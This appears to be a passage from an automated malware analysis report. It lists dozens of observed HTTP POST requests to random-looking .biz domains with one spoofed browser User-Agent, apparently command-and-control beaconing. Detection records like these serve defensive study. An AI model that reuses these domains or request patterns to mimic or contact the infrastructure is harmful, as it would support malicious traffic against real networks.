                    Source: global traffic  HTTP traffic detected: POST /bmgwtyy HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: ssbzmoy.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 834
                    Source: global traffic  HTTP traffic detected: POST /ghffopumxhoiq HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: cvgrf.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 834
                    Source: global traffic  HTTP traffic detected: POST /bgr HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: npukfztj.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 834
                    Source: global traffic  HTTP traffic detected: POST /fafj HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: przvgke.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 834
                    Source: global traffic  HTTP traffic detected: POST /dadmwtnbmefxvi HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: przvgke.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 834
                    Source: global traffic  HTTP traffic detected: POST /wofnqkoxvbvigg HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: knjghuig.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 834
                    Source: global traffic  HTTP traffic detected: POST /ccx HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: lpuegx.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 834
                    Source: global traffic  HTTP traffic detected: POST /nbnssijhjwmugla HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: lpuegx.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /hpkejgwwxdp HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: lpuegx.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 834
                    Source: global traffic  HTTP traffic detected: POST /pnckkgdjorsjoiow HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: vjaxhpbji.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /dhyyqtllpdwr HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: vjaxhpbji.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 834
                    Source: global traffic  HTTP traffic detected: POST /btnkoeanfymxsstk HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: vjaxhpbji.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /pgakntaoep HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: vjaxhpbji.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 834
                    Source: global traffic  HTTP traffic detected: POST /ihrtfcsj HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: xlfhhhm.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /ywao HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: ifsaia.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /hdfj HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: saytjshyf.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global traffic  HTTP traffic detected: POST /udjkgjnyfcxmpggx HTTP/1.1  Cache-Control: no-cache  Connection: Keep-Alive  Pragma: no-cache  Host: vcddkls.biz  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400  Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /lhiqwpom HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /opshcknhcx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /cmdgaowb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /ijfjro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /dvsybtnikly HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /kqhlsuvr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /emkvqhipcuidqkmd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /mqrfuyvbhtbn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /wt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /fqwxf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /wxdopk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ifsivywgpp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /kui HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /qlejchqklyh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fvlqmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /jmyxny HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /fshqbiv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /tipcpxgs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /qkmbmbtlinurxa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /mhnfavogqkp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /omaxykiwlg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /mggqfmrkiurp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /elpkfqto HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /mvjuawquor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /xqvmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /sltbypkjutmqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /risgh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /fvahgnbvglin HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /xwmumuqawghep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /anxrplnvdvpxn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /iytkitpluk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /cngo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /uwugf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /bvxo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /torfbleb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /iqacwcupavovv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /gknotpflubkt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /njk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /ljnnvokac HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /y HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /heowijklptfa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /jt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /gerofbpnhxbnel HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                    Source: global trafficHTTP traffic detected: POST /negfyndqat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                    Source: global trafficHTTP traffic detected: POST /twv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
